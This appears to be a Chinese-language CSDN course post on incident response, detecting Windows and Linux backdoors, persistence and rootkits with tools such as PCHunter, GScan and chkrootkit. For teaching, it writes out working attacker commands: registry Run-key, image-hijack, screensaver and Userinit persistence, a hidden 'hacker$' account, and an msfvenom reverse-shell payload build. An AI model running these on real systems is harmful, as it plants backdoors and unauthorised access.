第163天:应急响应-后门攻击检测指南_Rookit_内存马_权限维持_WIN_Linux

目录

[案例一: Windows-后门-常规&权限维持&内存马](#案例一: Windows-后门-常规&权限维持&内存马)

常规后门

权限维持

内存马

案例二:Linux-后门-常规&权限维持&Rootkit

常规

权限维持


案例一: Windows-后门-常规&权限维持&内存马

常规后门

常规msf后门,可以直接通过网络连接查看到

查看端口,就直接可以看到与别的主机建立了连接

利用火绒剑也可以查看连接,一般优先查看未知文件的连接,数字签名文件一般是有证书,如果免杀做的非常好,可以实现这一点

pchunter也可以查看不过不明显

权限维持

开机自启动

复制代码
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

火绒剑启动项里面查看自启动文件

pchunter里面

创建隐藏账户

复制代码
net user hacker$ hack!@#45 /add

pchunter中可以直接看到

可以直接删除

映像劫持

复制代码
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"		#修改注册表

pchunter中

火绒剑

屏幕保护

复制代码
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f	#屏保
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\msf.exe"		#远程登陆该计算机 启动shell

火绒启动中未知

pchunter中标为蓝色

内存马

基础检测这篇里面写过

第162天: 应急响应-网站入侵篡改指南&Webshell 内存马查杀&漏洞排查&时间分析-CSDN博客

在此基础之上补充一点,除了之前的那一种内存马,还有三种哥斯拉内存马

像这些写出来的,可以直接删除,而像瞎买按lister这个,就得使用类似headdump工具去进行一个手动分析

案例二:Linux-后门-常规&权限维持&Rootkit

常规

常规后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.172.130 LPORT=7777 -f elf >shell.elf

直接查看端口就可以

权限维持

工具下载地址:https://github.com/grayddq/GScan

设置两个权限维持,一个计时任务,一个alias执行命令,不会的看这篇文章

第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客

检测结果

rookit后门是写入了内核当中,用wireshark进行抓包都住不到。目前免费的系统都检测不到。只能是检测程序已经装好了,在监控的过程中发现了流量特征,有可能能够监控到

rookit复现案例:

第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客

rookit的检测工具:

Gscan也可以进行扫描
The Rootkit Hunter project
https://www.chkrootkit.org/

相关推荐
xixixi777776 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_466525296 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz567896 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_954708317 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
冰茶丿8 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
长风23010 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全
技术不好的崎鸣同学11 小时前
Windows 命令提示符(CMD)恶意脚本分析篇
网络·windows·安全·系统安全
Sagittarius_A*12 小时前
Docker:渗透前置容器化核心基础
运维·安全·docker·容器
孟郎郎12 小时前
AI 辅助开发编程敏感信息保护安全规范
人工智能·安全·ai·风险·隐患
iDao技术魔方13 小时前
Node.js v26.5.0 深度解读:import Text、流式 ReadableStreamTee、以及隐藏的安全加固浪潮
安全·node.js